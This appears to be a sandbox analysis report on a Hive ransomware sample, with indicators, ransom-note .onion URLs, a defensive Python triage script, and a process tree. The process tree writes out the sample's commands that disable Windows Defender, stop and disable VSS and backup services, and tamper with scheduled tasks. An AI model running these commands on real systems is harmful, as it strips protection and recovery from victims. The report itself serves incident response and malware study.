Analysis
- max time kernel: 160s
- max time network: 126s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 12-01-2022 19:09

Static task: static1
Behavioral task: behavioral1
- Sample: fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
- Resource: win7-en-20211208
General
- Target: fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
- Size: 2.7MB
- MD5: 524065ad3f33adcf7784f997d1089af4
- SHA1: 754e4389ce52c20629154313a8f19251b05f7e75
- SHA256: fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de
- SHA512: 87e52e975aafcb2256f8fb9aa10afbd78f70cdf0ccb399573087bc88044e289ac87678fcce34e29eb5af847ba910d29e3d5f4f72259ffe5e4e8cfce63b6ee69a
Malware Config

Extracted
- Path: C:\Program Files\7-Zip\4a7Z_HOW_TO_DECRYPT.txt
- Family: hive
- URLs:
  - http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
  - http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
- pid 2140  MpCmdRun.exe

Hive
A ransomware written in Golang first seen in June 2021.

Modifies security service 2 TTPs 1 IoCs
Processes:
- reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"

Clears Windows event logs 1 TTPs

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
- pid 2076  bcdedit.exe
- pid 2100  bcdedit.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory 64 IoCs
Processes: every entry below was performed by fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02356_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_sMUglmgXaOQ0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SlateBlue.css.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_xy6sHfieqqc0.7vilx
- File opened for modification: C:\Program Files\Java\jre7\lib\jfr\default.jfc.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_JBpz6btcXIY0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0301418.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_INoR85N0wzw0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Document.gif.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_VZhqpKGzgZk0.7vilx
- File opened for modification: C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)greenStateIcon.png
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_y97lD1-8Uvw0.7vilx
- File opened for modification: C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_Tb6T9d5ISJc0.7vilx
- File opened for modification: C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART7.BDR.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_Ky07mdlPd-I0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_3CxjwLR3M-I0.7vilx
- File opened for modification: C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_kWKQs3wEJo40.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01173_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_42tRPV6mNiY0.7vilx
- File created: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\4a7Z_HOW_TO_DECRYPT.txt
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialoccasion.png
- File opened for modification: C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212953.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_arNdJFQIkc80.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_XlYBolJFvKw0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_as443v6H82Q0.7vilx
- File created: C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\4a7Z_HOW_TO_DECRYPT.txt
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_IW6Snn9pz4o0.7vilx
- File opened for modification: C:\Program Files\Windows Sidebar\fr-FR\Sidebar.exe.mui
- File opened for modification: C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18210_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_AAHY4eQbWWU0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZTOOL.ACCDE.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_-1_CjL-_7EQ0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_v_8pNnhTru80.7vilx
- File opened for modification: C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png
- File created: C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LAYERS\4a7Z_HOW_TO_DECRYPT.txt
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationRight_SelectionSubpicture.png
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_DHNstYy3HJY0.7vilx
- File opened for modification: C:\Program Files\Java\jre7\lib\zi\America\Juneau.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_tZY5lSVYiGA0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00382_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_LWJ4VosnqSY0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00170_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_hIgcKRu40lY0.7vilx
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\notes-static.png
- File opened for modification: C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_ButtonGraphic.png
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WORDREP.DPV.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_YUBnwULW9Uo0.7vilx
- File opened for modification: C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_rest.png
- File created: C:\Program Files\Java\jre7\lib\security\4a7Z_HOW_TO_DECRYPT.txt
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_zsivfCxq9900.7vilx
- File opened for modification: C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Stationery\1033\NOTEBOOK.JPG.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_wlJ5ZoLhppw0.7vilx
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_Rz8F7kbEc8k0.7vilx
- File opened for modification: C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\logo.png
- File opened for modification: C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\MSB1FREN.ITS.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_O3udpGSPqBs0.7vilx
- File opened for modification: C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\micaut.dll.mui
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_XrZ1nygenpI0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART6.BDR.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_cDeWpVK2t9U0.7vilx
- File created: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\4a7Z_HOW_TO_DECRYPT.txt
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_5N2ddHDno1I0.7vilx
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_u3K8R2_vYXk0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21298_.GIF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_n_UZvscAGEE0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\SETLANG_K_COL.HXK.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_ztfGfJy3WBI0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_underline.gif.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_DSpVepB64QQ0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL106.XML.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_LzPPLt--dEg0.7vilx
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_hB4KL9VbdAk0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0164153.JPG.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_4HFJrVDfK_U0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_gHZcAqbvBaw0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB_COL.HXT.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_QxUfmxq-SE00.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME35.CSS.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_yKzWWKw1EKI0.7vilx
- File opened for modification: C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_GCIQHn1N-gU0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187861.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_oAySEKdt7dI0.7vilx
- File opened for modification: C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert.css.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_UOCicoHhpAw0.7vilx
Launches sc.exe
sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
- pid 1500  vssadmin.exe

Opens file in notepad (likely ransom note) 1 IoCs
Processes:
- pid 2644  notepad.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
- pid 2172  powershell.exe
- pid 2264  powershell.exe
- pid 744   fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (privileges enabled on the process token):
- wevtutil.exe pid 1564: SeSecurityPrivilege, SeBackupPrivilege
- wevtutil.exe pid 1916: SeSecurityPrivilege, SeBackupPrivilege
- wevtutil.exe pid 1904: SeSecurityPrivilege, SeBackupPrivilege
- wmic.exe pid 328: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
- wmic.exe pid 428: the same 20 privileges, then the same sequence enabled a second time up to 33 (the list is cut at 64 IoCs)

The bare numbers are privilege LUIDs the sandbox leaves unnamed: 33 = SeIncreaseWorkingSetPrivilege, 34 = SeTimeZonePrivilege, 35 = SeCreateSymbolicLinkPrivilege. Enabling every privilege on the token is normal for wmic.exe; the signature fires on wevtutil.exe because SeSecurityPrivilege and SeBackupPrivilege are exactly what clearing the Security log requires.
Suspicious use of WriteProcessMemory 64 IoCs
Processes (source pid -> target pid, source -> target; "dropper" is fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe; each parent-to-child write is logged three times):
- 744 -> 520    dropper -> net.exe (x3)
- 520 -> 848    net.exe -> net1.exe (x3)
- 744 -> 532    dropper -> net.exe (x3)
- 532 -> 628    net.exe -> net1.exe (x3)
- 744 -> 1624   dropper -> net.exe (x3)
- 1624 -> 1108  net.exe -> net1.exe (x3)
- 744 -> 796    dropper -> net.exe (x3)
- 796 -> 964    net.exe -> net1.exe (x3)
- 744 -> 2008   dropper -> net.exe (x3)
- 2008 -> 1640  net.exe -> net1.exe (x3)
- 744 -> 1820   dropper -> net.exe (x3)
- 1820 -> 1252  net.exe -> net1.exe (x3)
- 744 -> 2036   dropper -> net.exe (x3)
- 2036 -> 1860  net.exe -> net1.exe (x3)
- 744 -> 1460   dropper -> net.exe (x3)
- 1460 -> 1500  net.exe -> net1.exe (x3)
- 744 -> 1548   dropper -> sc.exe (x3)
- 744 -> 868    dropper -> sc.exe (x3)
- 744 -> 588    dropper -> sc.exe (x3)
- 744 -> 1760   dropper -> sc.exe (x3)
- 744 -> 900    dropper -> sc.exe (x3)
- 744 -> 1076   dropper -> sc.exe (x1; the list is cut at 64 IoCs)
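Two file-system artefacts in the IoC list above are what an incident responder will triage on a live host: every encrypted file is renamed to "<original name>.<56-character base64url blob>.7vilx", with all 64 blobs sharing the 44-character prefix fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_ followed by 12 per-file characters, and a 4a7Z_HOW_TO_DECRYPT.txt note is created once per directory (the Malware Config section extracted the two .onion URLs from one such note). The Python below is an added example for this page, not sandbox output and not Hive code. It builds a constructed directory tree from a few of the report's own paths, finds the renamed files, groups them by the shared prefix, splits the blob into its 33-byte shared and 9-byte per-file parts (44 and 12 base64 characters respectively) without claiming what those bytes mean, and pulls .onion URLs out of the notes. The note text is a constructed stand-in that contains only the two URLs from the Malware Config; the decoy notes.7vilx and the untouched ENUtxt.pdf are there to show what the pattern must not match.

```python
"""Triage for Hive-style artefacts: <name>.<56-char blob>.7vilx renames and
per-directory 4a7Z_HOW_TO_DECRYPT.txt notes. Added example, not report output."""
import base64
import re
import tempfile
from collections import Counter
from pathlib import Path

RANSOM_NOTE = "4a7Z_HOW_TO_DECRYPT.txt"
PREFIX_CHARS = 44  # blob prefix common to every encrypted name in the report

# <original name>.<56 url-safe base64 characters>.7vilx
ENC_RE = re.compile(r"^(?P<orig>.+)\.(?P<blob>[A-Za-z0-9_-]{56})\.7vilx$")
# Tor hidden-service URL; v3 addresses are 56 base32 characters
ONION_RE = re.compile(r"https?://[a-z2-7]{16,56}\.onion/?")

# Constructed fixture: relative paths taken from the report's IoC list plus two
# negatives (an untouched file and a decoy carrying only the extension).
FIXTURE_FILES = [
    "Program Files (x86)/Microsoft Office/CLIPART/PUB60COR/NA02356_.WMF.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_sMUglmgXaOQ0.7vilx",
    "Program Files/Java/jre7/lib/jfr/default.jfc.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_JBpz6btcXIY0.7vilx",
    "Program Files (x86)/Microsoft Office/Office14/ACCWIZ/ACWZTOOL.ACCDE.fWiqtFA56Evdhsvy8ZnEC4e4S8-7Of_R5ZONK7KD8tD_-1_CjL-_7EQ0.7vilx",
    "Program Files (x86)/Adobe/Reader 9.0/Resource/ENUtxt.pdf",  # opened, never renamed
    "Program Files/7-Zip/notes.7vilx",                            # decoy: no 56-char blob
    "Program Files/7-Zip/" + RANSOM_NOTE,
    "Program Files/Java/jre7/lib/security/" + RANSOM_NOTE,
]
# Constructed stand-in for the note body; only the URLs come from the report.
NOTE_TEXT = (
    "Constructed stand-in for the ransom note, not the real text.\n"
    "http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/\n"
    "http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/\n"
)


def decode_blob(blob: str) -> tuple[bytes, bytes]:
    """Split the 56-char blob into the shared 33-byte part and the 9-byte
    per-file part. Both lengths are multiples of 4 chars, so they decode
    independently. The meaning of the bytes is not interpreted here."""
    shared = base64.urlsafe_b64decode(blob[:PREFIX_CHARS])
    per_file = base64.urlsafe_b64decode(blob[PREFIX_CHARS:])
    return shared, per_file


def scan(root: Path) -> dict:
    """Walk root and collect encrypted files, ransom notes, the blob prefixes
    seen (one prefix per run in this report) and any .onion URLs in notes."""
    encrypted, notes, prefixes, urls = [], [], Counter(), set()
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        if p.name == RANSOM_NOTE:
            notes.append(str(p.relative_to(root)))
            urls.update(ONION_RE.findall(p.read_text(errors="replace")))
            continue
        m = ENC_RE.match(p.name)
        if m:
            encrypted.append((str(p.relative_to(root)), m["orig"]))
            prefixes[m["blob"][:PREFIX_CHARS]] += 1
    return {"encrypted": encrypted, "notes": notes,
            "key_prefixes": prefixes, "onion_urls": urls}


def build_fixture(root: Path) -> None:
    """Materialise the constructed tree under root."""
    for rel in FIXTURE_FILES:
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(NOTE_TEXT if p.name == RANSOM_NOTE else "placeholder")


def run_demo() -> dict:
    """Build the fixture in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        build_fixture(root)
        return scan(root)


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(k, v)
```

On a real host point scan() at each volume root; a count of one key prefix across the whole tree is consistent with this report, while several prefixes would mean several runs or several hosts' data on one share. The ransom-note path in the Malware Config (C:\Program Files\7-Zip\4a7Z_HOW_TO_DECRYPT.txt) is the kind of note the URL extraction is meant for.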
Processes
(indentation = depth in the process tree; [PID] image :: command line; signature hits listed beneath each process)

[PID 744] C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe :: "C:\Users\Admin\AppData\Local\Temp\fc28a355483acd3c0e81891822e81e9989d45b4d9bc8a33096d92c3a227b92de.exe"
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  [PID 520] C:\Windows\system32\net.exe :: net.exe stop "NetMsmqActivator" /y
    - Suspicious use of WriteProcessMemory
    [PID 848] C:\Windows\system32\net1.exe :: C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  [PID 532] C:\Windows\system32\net.exe :: net.exe stop "SamSs" /y
    - Suspicious use of WriteProcessMemory
    [PID 628] C:\Windows\system32\net1.exe :: C:\Windows\system32\net1 stop "SamSs" /y
  [PID 1624] C:\Windows\system32\net.exe :: net.exe stop "SDRSVC" /y
    - Suspicious use of WriteProcessMemory
    [PID 1108] C:\Windows\system32\net1.exe :: C:\Windows\system32\net1 stop "SDRSVC" /y
  [PID 796] C:\Windows\system32\net.exe :: net.exe stop "SstpSvc" /y
    - Suspicious use of WriteProcessMemory
    [PID 964] C:\Windows\system32\net1.exe :: C:\Windows\system32\net1 stop "SstpSvc" /y
  [PID 2008] C:\Windows\system32\net.exe :: net.exe stop "UI0Detect" /y
    - Suspicious use of WriteProcessMemory
    [PID 1640] C:\Windows\system32\net1.exe :: C:\Windows\system32\net1 stop "UI0Detect" /y
  [PID 1820] C:\Windows\system32\net.exe :: net.exe stop "VSS" /y
    - Suspicious use of WriteProcessMemory
    [PID 1252] C:\Windows\system32\net1.exe :: C:\Windows\system32\net1 stop "VSS" /y
  [PID 2036] C:\Windows\system32\net.exe :: net.exe stop "wbengine" /y
    - Suspicious use of WriteProcessMemory
    [PID 1860] C:\Windows\system32\net1.exe :: C:\Windows\system32\net1 stop "wbengine" /y
  [PID 1460] C:\Windows\system32\net.exe :: net.exe stop "WebClient" /y
    - Suspicious use of WriteProcessMemory
    [PID 1500] C:\Windows\system32\net1.exe :: C:\Windows\system32\net1 stop "WebClient" /y
  [PID 1548] C:\Windows\system32\sc.exe :: sc.exe config "NetMsmqActivator" start= disabled
  [PID 868] C:\Windows\system32\sc.exe :: sc.exe config "SamSs" start= disabled
  [PID 588] C:\Windows\system32\sc.exe :: sc.exe config "SDRSVC" start= disabled
  [PID 1760] C:\Windows\system32\sc.exe :: sc.exe config "SstpSvc" start= disabled
  [PID 900] C:\Windows\system32\sc.exe :: sc.exe config "UI0Detect" start= disabled
  [PID 1076] C:\Windows\system32\sc.exe :: sc.exe config "VSS" start= disabled
  [PID 1596] C:\Windows\system32\sc.exe :: sc.exe config "wbengine" start= disabled
  [PID 268] C:\Windows\system32\sc.exe :: sc.exe config "WebClient" start= disabled
  [PID 1012] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [PID 1364] C:\Windows\system32\reg.exe :: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  [PID 1352] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  [PID 964] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  [PID 1828] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  [PID 2040] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  [PID 1484] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  [PID 1476] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  [PID 1436] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  [PID 1732] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  [PID 1752] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  [PID 1676] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  [PID 2044] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  [PID 1584] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  [PID 1664] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  [PID 1228] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  [PID 1108] C:\Windows\system32\schtasks.exe :: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  [PID 1620] C:\Windows\system32\schtasks.exe :: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  [PID 1252] C:\Windows\system32\schtasks.exe :: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  [PID 1860] C:\Windows\system32\schtasks.exe :: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  [PID 480] C:\Windows\system32\schtasks.exe :: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  [PID 916] C:\Windows\system32\reg.exe :: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  [PID 1064] C:\Windows\system32\reg.exe :: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  [PID 324] C:\Windows\system32\reg.exe :: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  [PID 468] C:\Windows\system32\reg.exe :: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  [PID 1792] C:\Windows\system32\reg.exe :: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  [PID 968] C:\Windows\system32\reg.exe :: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  [PID 1280] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  [PID 788] C:\Windows\system32\reg.exe :: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
